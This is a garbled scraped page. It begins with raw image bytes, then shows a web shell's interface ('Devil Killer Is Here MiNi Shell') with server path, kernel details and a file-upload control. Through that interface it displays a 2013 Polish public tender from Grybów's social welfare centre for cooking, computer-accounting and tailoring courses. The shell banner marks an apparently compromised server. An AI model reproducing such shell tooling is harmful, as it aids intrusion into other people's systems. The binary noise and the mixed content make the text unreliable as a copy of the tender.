JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131017/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131017/217037-N-2013.html

<p class="kh_header"><b>Grybów: Organizacja i przeprowadzenie szkoleń - kursów: Kucharz , Obsługa komputera - podstawy wraz z obsługą programów księgowych oraz Krawiec odzieży lekkiej dla Beneficjentów Ostatecznych biorących udział w realizowanych przez Gminny Ośrodek Pomocy Społecznej w Grybowie projekcie systemowym PO KL pt: Nowe perspektywy - nowe szanse!, na podstawie umowy zawartej z Wojewódzkim Urzędem Pracy w Krakowie o dofinansowanie wyżej wskazanego projektu w ramach Poddziałania 7.1.1, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 217037 - 2013; data zamieszczenia: 17.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek  Pomocy Społecznej w Grybowie , ul. Jakubowskiego 33, 33-330 Grybów, woj. małopolskie, tel. 18 448 42 46, faks 18 448 42 46.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie szkoleń - kursów: Kucharz , Obsługa komputera - podstawy wraz z obsługą programów księgowych oraz Krawiec odzieży lekkiej dla Beneficjentów Ostatecznych biorących udział w realizowanych przez Gminny Ośrodek Pomocy Społecznej w Grybowie projekcie systemowym PO KL pt: Nowe perspektywy - nowe szanse!, na podstawie umowy zawartej z Wojewódzkim Urzędem Pracy w Krakowie o dofinansowanie wyżej wskazanego projektu w ramach Poddziałania 7.1.1, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa polegająca na organizacji, przygotowaniu                    i przeprowadzeniu szkoleń - kursów tj: Kucharz dla 11 osób, Obsługa komputera - podstawy wraz z obsługą programów księgowych dla 7 osób oraz Krawiec odzieży lekkiej dla 3 osób z terenu Gminy Grybów w ramach projektu systemowego Programu Operacyjnego Kapitał Ludzki pt: Nowe perspektywy - nowe szanse!, zadanie 1 Aktywna integracja. Projekt realizowany jest przez Gminny Ośrodek Pomocy Społecznej w Grybowie w ramach Programu Operacyjnego Kapitał Ludzki, Działanie 7. 1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.

2. Program szkolenia winien być przeprowadzony zgodnie z Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 14 września 2010 r. w sprawie standardów i warunków prowadzenia usług na rynku pracy (Dz. U. Nr 177, poz. 1193 ze zm.).
3. Przedmiot zamówienia został opisany poniżej i obejmuje opracowanie zakresu tematycznego szkoleń - kursów w następujący sposób:

a) Kurs: Kucharz:
Zakres tematyczny obejmuje równocześnie elementy teoretyczne jak i praktyczne:
-   elementy etyki zawodowej,
-   podstawowe zasady Bezpieczeństwa Higieny Pracy,
-   podstawy żywienia człowiek,
- obsługa maszyn i urządzeń (np.: krajalnicy, płuczko - obieraczki, maszynki do mielenia, zmywarki do naczyń, pieca itp.) używanych do obróbki i przygotowywania potraw.
-   sporządzanie potraw z warzyw:

	zastosowanie warzyw i owoców w gastronomii,
	technika sporządzania surówek sezonowych,
	technika sporządzania sałatek jarzynowych,
	sporządzanie bukietu z warzyw,
	technika dekorowania i serwowania potraw z warzyw.

-    sporządzanie potraw z jaj i przetworów mleczarskich:

	sporządzanie koreczków  serowych,
	sporządzanie chłodników,
	desery i napoje z przetworów mleczarskich,
	przygotowanie potraw z jaj gotowanych,
	technika sporządzania jaj faszerowanych,
	sporządzanie potraw z jaj smażonych,
	technika formowania omletów,
	technika sporządzania jaj nadziewanych,
	technika sporządzania kotlecików z jaj,
	technika sporządzania zakąsek z jaj,

-    sporządzanie zup:
	technika wykonania zup kremowych,
	sposoby zagęszczania zup kremowych,
	etapy sporządzania zup zagęszczanych,
	sporządzanie zup zagęszczanych składnikiem skrobiowym,
	sporządzanie zup zagęszczanych zawiesiną,
	sporządzanie zup zagęszczanych zasmażką,
	dodatki stosowane do zup czystych i zagęszczanych,
        porcjowanie i podawanie zup czystych i kremowych,
	porcjowanie i podawanie zup zagęszczanych,
	technika sporządzania sosów na gorąco,

-    sporządzanie potraw mącznych:
	obróbka wstępna składników  ciasta,
	rodzaje ciast wyrabianych w naczyniu,
	sporządzanie ciast zarabianych w naczyniu,
	zastosowanie ciast gotowanych i smażonych,
	ciasta wyrabiane na stolnicy,
	rodzaje dodatków i sposoby formowania wyrobów,
	przygotowanie pierogów i ich gotowanie,
	technika sporządzania kołdunów  i uszek,
	techniki sporządzania ciast drożdżowych,
	techniki sporządzania ciast kruchych i półkruchych,

-    ciasta ziemniaczane:
	normatywy surowcowe na poszczególne rodzaje ciast ziemniaczanych,
	sporządzanie klusek śląskich i kopytek,
	sporządzanie knedli z owocami i mięsem,
	sporządzanie kotletów ziemniaczanych,
	sporządzanie potraw z ziemniaków surowych tartych,

-     zastosowanie potraw jarskich i półmięsnych w gastronomii:
	sposoby podawania potraw jarskich i półmięsnych,
	zastosowanie potraw jarskich  i półmięsnych  w gastronomii,
	potrawy półmięsne gotowane,
	potrawy półmięsne smażone i duszone,
	potrawy półmięsne zapiekane,

-     potrawy z drobiu:
	przygotowanie drobiu do obróbki wstępnej i cieplnej,
	podstawowe i dodatkowe składniki drobiowej masy mielonej,
	asortyment potraw  smażonych z drobiu i stosowanych dodatków,
	asortyment potraw  pieczonych z drobiu i stosowanych dodatków,
	asortyment potraw  grillowanych z drobiu i stosowanych dodatków, 

-    potrawy z ryb, asortyment potraw z ryb:
	normatyw surowców na potrawy z ryb,
	obróbka wstępna,
	sporządzanie drobiowej masy mielonej i formowanie półproduktów,
	techniki obróbki cieplnej półproduktów z drobiowej masy mielonej zgodnie 
z  GHP/GMP.

-    sporządzanie przekąsek zimnych i gorących:
	techniki sporządzania sosów zimnych,
	sporządzanie różnych typów kanapek,
	sporządzanie przekąsek gorących,
	sporządzanie przekąsek zimnych ze szczególnym uwzględnieniem sposobu podawania i dekoracji,
	przygotowanie zimnego bufetu; sposoby ustawiania napoi,  przekąsek i dodatków.
Liczba godzin szkoleniowych grupowych (dla grupy 11 osób - minimum 100 godzin                w ciągu 17 dni po 6 godzin dziennie).
Za godzinę zegarową kursu Kucharza przyjmuje się 45 minut zajęć edukacyjnych oraz 15 minut przerwy.
Zamawiający  wymaga aby kurs Kucharz odbywał się w nieczynnym w czasie szkoleniowym przeprowadzania kursu zakładzie gastronomicznym.

b) Obsługa komputera - podstawy wraz z obsługą programów księgowych:
Zakres tematyczny obejmuje aspekty teoretyczne jak i praktyczne:
a) Podstawy obsługi komputera - system operacyjny Windows XP:
- elementy budowy komputera,
- zasady pracy w systemie Windows,
- skróty i ich zastosowanie,
- programy, których używamy na co dzień: Notatnik, Power Point, Kalkulator, 
- panel sterowania i jego zastosowanie,
b) Organizacja i zarządzanie danymi w komputerze:
- pliki i foldery,
- tworzenie, kopiowanie i kasowanie plików, folderów i skrótów,
c) Obsługa edytora tekstów Word - podstawy
- redagowanie dokumentu,
- formatowanie tekstu,
- praca z tabelami i na tabelach,
- grafika w edytorze tekstu Word,
- ustawianie dokumentu do wydruku, drukowanie dokumentu,
d) Obsługa arkusza kalkulacyjnego Excel - podstawy:
- arkusz kalkulacyjny i jego zastosowanie,
- praca na arkuszu: omówienie budowy arkusza, wprowadzanie danych, kasowanie,
- formuły i funkcje - podstawy,
- sortowanie danych,
- tworzenie wykresów,
- ustawianie arkusza do wydruku, drukowanie arkusza, 
e) Tworzenie prezentacji w Power Point,
f) Podstawy Internetu:
- zasady obsługi przeglądarki internetowej,
- wyszukiwanie danych w Internecie,
- co to jest wirus? Jak się chronić przed nim,
g) poczta elektroniczna:
- zakładanie skrzynki pocztowej,
- tworzenie, wysyłanie, odbieranie e-mail,
- tworzenie folderów, przenoszenie, sortowanie meili, 
h) Małe i średnie przedsiębiorstwa; 
- podstawy prawne i zasady prowadzenia rachunkowości w małych i średnich przedsiębiorstwach, 
- dokumentacja przyjętych zasad prowadzenia rachunkowości w małych i średnich przedsiębiorstwach, 
- podstawowe zasady otwierania, prowadzenia i zamykania ksiąg rachunkowych w małych      i średnich przedsiębiorstwach,
- dokumentacja zasad prowadzenia rachunkowości przy użyciu komputera, 
- zasady sporządzania, obiegu, kontroli i przechowywania dowodów księgowych w małych     i średnich przedsiębiorstwach,
 - charakterystyka i ewidencja księgowa aktywów trwałych,
 - charakterystyka i ewidencja księgowa aktywów obrotowych,
 - charakterystyka i ewidencja księgowa kosztów i przychodów,
 - podatkowa księga przychodów i rozchodów w przedsiębiorstwie,
 - kapitały w przedsiębiorstwie,
 - zamknięcie ksiąg rachunkowych w przedsiębiorstwie,
 -wybrane zagadnienia Kodeksu Cywilnego,
 - umowy cywilno prawne,
 - warunki zatrudnienia,
i) Prawo pracy, kadry:
- organizacja i funkcjonowanie komórki spraw osobowych firmy,
- akta osobowe, ewidencje, rodzaje i sposoby prowadzenia,
- prawo pracy,
- stosunek pracy - rodzaje umów,
- obowiązki pracowników i pracodawcy,
- czas pracy,
- urlopy wypoczynkowe i bezpłatne,
j) Płace i ZUS:
- prawne i ekonomiczne aspekty wynagradzania,
- systemy wynagrodzeń - czasowy, prowizyjny, akordowy,
- zasady naliczania niektórych składników,
- płatnik składek i zasady podlegania w systemie ubezpieczeń społecznych,
- składki na Fundusz Pracy i Fundusz gwarantowanych Świadczeń Pracowniczych,
- ustalanie stopy procentowej na ubezpieczenie wypadkowe,
- podatki,
k) obsługa programów: Płatnik oraz wybranego programu księgowego:
- wprowadzanie danych,
- zakładanie nowej firmy w programie,
- tworzenie, ewidencjonowanie czasu pracy: pracowników, zleceniobiorców,
- tworzenie umów gwarancyjnych, zlecenia, o dzieło, list płac, wydruków dokumentów,
- transmisja danych,
- wprowadzanie danych,
- tworzenie rejestru firmy,
- tworzenie wydruków,
- tworzenie dokumentów zgłoszeniowo - rozliczeniowych,
Liczba godzin szkoleniowych grupowych (dla grupy 7 osób - minimum 60 godzin                w ciągu 10 dni po 6 godzin dziennie).
Za godzinę zegarową kursu Obsługa komputera - podstawy wraz z obsługą programów księgowych przyjmuje się 45 minut zajęć edukacyjnych oraz 15 minut przerwy.

c) Krawiec odzieży lekkiej:
Zakres tematyczny obejmuje aspekty teoretyczne jak i praktyczne:
a) Szycie ręczne:
- elementy niezbędne w procesie szycia,
- nauka szycia ręcznego: fastryga, ścieg pętelkowy i za igła,
- sposoby przyszywania: zatrzaski, haftki, guziki, gumki,
- zapoznanie się z rodzajami dodatków krawieckich i elementami pasmanterii,
b) Konstruowanie form odzieżowych:
- omówienie linii i płaszczyzny ciała,
- przygotowanie do miary, profesjonalne branie miary,
- nauka korzystania z gotowych wykrojów,
- przygotowywanie szablonów, nauka krojenia,
c) Nauka szycia na maszynie:
- budowa maszyny do szycia, nauka nawlekania nici i ustawianie ściegu,
- szycie na maszynie z nićmi i na sucho,
- szycie spódnicy, spodni, bluzki, sukienki - robienie formy, krojenie,
d) Wykonywanie poprawek krawieckich:
- skracanie spódnicy, rękawów, żakietu, spodni,
- zwężanie, poszerzanie,
- nauka szycia: kieszeni, kołnierza,
- nauka wykorzystywania flizeliny,
- różne sposoby wykańczania,
e) samodzielne szycie na maszynie:
- wykonanie własnego projektu wybranego elementu garderoby (zdjęcie miary, wykonanie szablonu, krojenie materiału),
- szycie odzieży na miarę: bluzka, spódnica, sukienka, spodnie,
f) Stylizacja własnej garderoby:
- nauka wszywania: koronek, wkładów barkowych, tasiemek,
- naszywanie koralików, dżetów,
- wykonywanie lamówek (podkoszulek, spódnica, żakiet, sukienka)

4. Informacje dodatkowe, które należy uwzględnić w cenie oferty:
Zajęcia odbywać się będą od poniedziałku do piątku w dniach pracy Zamawiającego                    w godzinach pomiędzy 800 - 1500.
Wykonawca zobowiązany jest zapewnić na czas trwania zajęć w ramach szkoleń - kursów                      w szczególności:
- Pomieszczenia przystosowane do wykonania  Przedmiotu zamówienia, które winny być klimatyzowane         z miejscem siedzącym dla każdego Uczestnika Projektu.
- Wyposażenie każdego Uczestnika  w bezzwrotne materiały piśmiennicze tj: notes, długopis, teczka tekturowa na gumkę, dziennik zajęć oraz materiały dydaktyczne, które należy oznaczyć logo Programu Operacyjnego Kapitał Ludzki, emblematem Unii Europejskiej           z podpisem Europejski Fundusz Społeczny.
- Otrzymanie przez każdego Uczestnika w przypadku trwania zajęć powyżej 4 godzin           w każdym dniu szkoleń - kursów - gorącego posiłku (obiad dwudaniowy, kompot). Produkty używane do przygotowania gorącego posiłku winny spełniać normy żywieniowe oraz sanitarno - epidemiologiczne.
- Otrzymanie przez każdego Uczestnika w trakcie zajęć w każdym dniu szkoleń - kursów serwisu kawowego tj: kawa, herbata, zimne napoje, suche ciastka, cukier, śmietanka do kawy, świeże owoce. Produkty podawane podczas serwisu kawowego winny spełniać normy żywieniowe oraz sanitarno - epidemiologiczne.
- Wykonawca zobowiązany jest prowadzić nadzór wewnętrzny nad prowadzonymi zajęciami tj: prowadzić imienne listy obecności, imienne potwierdzenia odbioru materiałów piśmienniczych i dydaktycznych, imienne potwierdzenia odbioru serwisu kawowego oraz gorącego posiłku, dzienniki zajęć, rejestry wydanych zaświadczeń i certyfikatów, potwierdzenia odbioru wydanych zaświadczeń i certyfikatów, ankiety na rozpoczęcie              i zakończenie, testy wiedzy na rozpoczęcie i zakończenie, protokoły z egzaminów oraz dostarczyć ich Zamawiającemu. Powyższy nadzór wewnętrzny winien być prowadzony osobno dla wszystkich w/w szkoleń - kursów.
- Każda osoba winna mieć własne stanowisko wyposażone w urządzenia/ sprzęt niezbędny dla ukończenia szkolenia - kursu np. w osobny komputerw zależności od tematyki kursu.
- Po zakończeniu w/w szkoleń - kursów Wykonawca wyda każdemu Uczestnikowi osobne dla każdego rodzaju wsparcia zaświadczenia i certyfikaty, a kopie potwierdzone za zgodność       z oryginałem przekaże Zamawiającemu.
- Każde szkolenie winno zakończyć się egzaminem.
- Wykonawca zapewni wszystkim Uczestnikom szkolenie BHP oraz odzież ochronną.
- Wszyscy Uczestnicy mają mieć zapewnione Ubezpieczenie od Następstw Nieszczęśliwych Wypadków.
- Zaleca się aby całość zamówienia realizowana była na terenie Gminy Grybów. Zamawiający dopuszcza jednak możliwość organizacji i przeprowadzenia szkoleń poza obszarem Gminy  Grybów, w takim przypadku Wykonawca zapewni uczestnikom szkoleń transport tj. dojazd do miejsca szkolenia z Grybowa oraz powrót do Grybowa..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 13.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie powyższego warunku zamawiający uzna posiadanie przez Wykonawcę aktualnego wpisu do Rejestru Instytucji Szkoleniowych  prowadzonych przez Wojewódzki Urząd Pracy właściwy dla siedziby Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie tego warunku Zamawiający uzna wykonanie z należytą starannością w okresie trzech ostatnich lat (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), przed dniem składania ofert:
	co najmniej trzech różnych usług, polegających na zorganizowaniu                                  i przeprowadzeniu szkoleń - kursów: Kucharz (jedna usługa), Obsługa komputera - podstawy wraz z obsługą programów księgowych (druga usługa), oraz Krawiec odzieży lekkiej (trzecia usługa) o tematyce zgodnej                                   z wyszczególnioną                w niniejszym zamówieniu w oparciu    o tą, którą określono w Dziale 2 SIWZ, z podaniem ich wartości, nazwy zleceniodawcy, terminu realizacji (według wzoru stanowiącego Załącznik Nr 5 do SIWZ), a także załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie i łącznie
	wykonanie należycie głównych dostaw lub usług (tj. brak jakiejkolwiek głównej usługi lub dostawy w tym okresie, która zostałaby wykonana nienależycie), w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków                          o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, (według wzoru stanowiącego Załącznik Nr 5 do SIWZ) oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;

Na podstawie złożonych dokumentów Zamawiający dokona oceny spełnienia wymaganego warunku wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie powyższego warunku, Zamawiający uzna wykazanie przez Wykonawcę osób (kadra zawodowa - według wzoru stanowiącego Załącznik Nr 6 do SIWZ) mających uczestniczyć w realizacji przedmiotu zamówienia, posiadających kwalifikacje zawodowe niezbędne do realizacji zamówienia tj.:
- trener - informatyk, osoba posiadająca uprawnienia pedagogiczne do prowadzenia zajęć (obsługa komputera), minimum 2 - letnie doświadczenie w charakterze trenera.
- trener - osoba uprawniona do przeprowadzenia kursu (szkolenia) w zakresie rachunkowości/księgowości, posiadająca minimum 2 - letnie doświadczenie w charakterze trenera, posiadające wykształcenie wyższe ekonomiczne, oraz uprawnienia pedagogiczne.
- trener - osoba posiadająca uprawnienia pedagogiczne do nauczania w zakresie technologii żywności, minimum 2 - letnie doświadczenie w charakterze trenera.
- trener - osoba prowadzące zajęcia praktyczne, osoby posiadająca uprawnienia do wykonywania zawodu kucharza, przygotowanie pedagogiczne, minimum 2 - letnie doświadczenie w charakterze trenera.
- trener - osoba posiadająca uprawnienia do prowadzenia zajęć teoretycznych z zakresu krawiectwa lekkiego, posiadająca wykształcenie minimum średnie kierunkowe, uprawnienia pedagogiczne i minimum 2- letnie doświadczenie w charakterze trenera.

Na podstawie oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych (Załącznik Nr 3 do SIWZ) oraz wykazu kadry zawodowej proponowanej do wykonania usług (Załacznik Nr 6 do SIWZ) Zamawiający dokona oceny spełnienia wymaganego warunku wg formuły : spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie powyższego warunku zamawiający uzna posiadanie przez Wykonawcę aktualnego wpisu do Rejestru Instytucji Szkoleniowych  prowadzonych przez Wojewódzki Urząd Pracy właściwy dla siedziby Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych (Załącznik Nr 3 do SIWZ) Zamawiający dokona oceny spełnienia wymaganego warunku wg formuły : spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> WWW.wrotamalopolski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej
ul. Jakubowskiego 33
33-330 Grybów
pokój nr 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.10.2013 godzina 08:30, miejsce: Gminny Ośrodek Pomocy Społecznej
ul. Jakubowskiego 33
33-330 Grybów
pokój nr 5.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
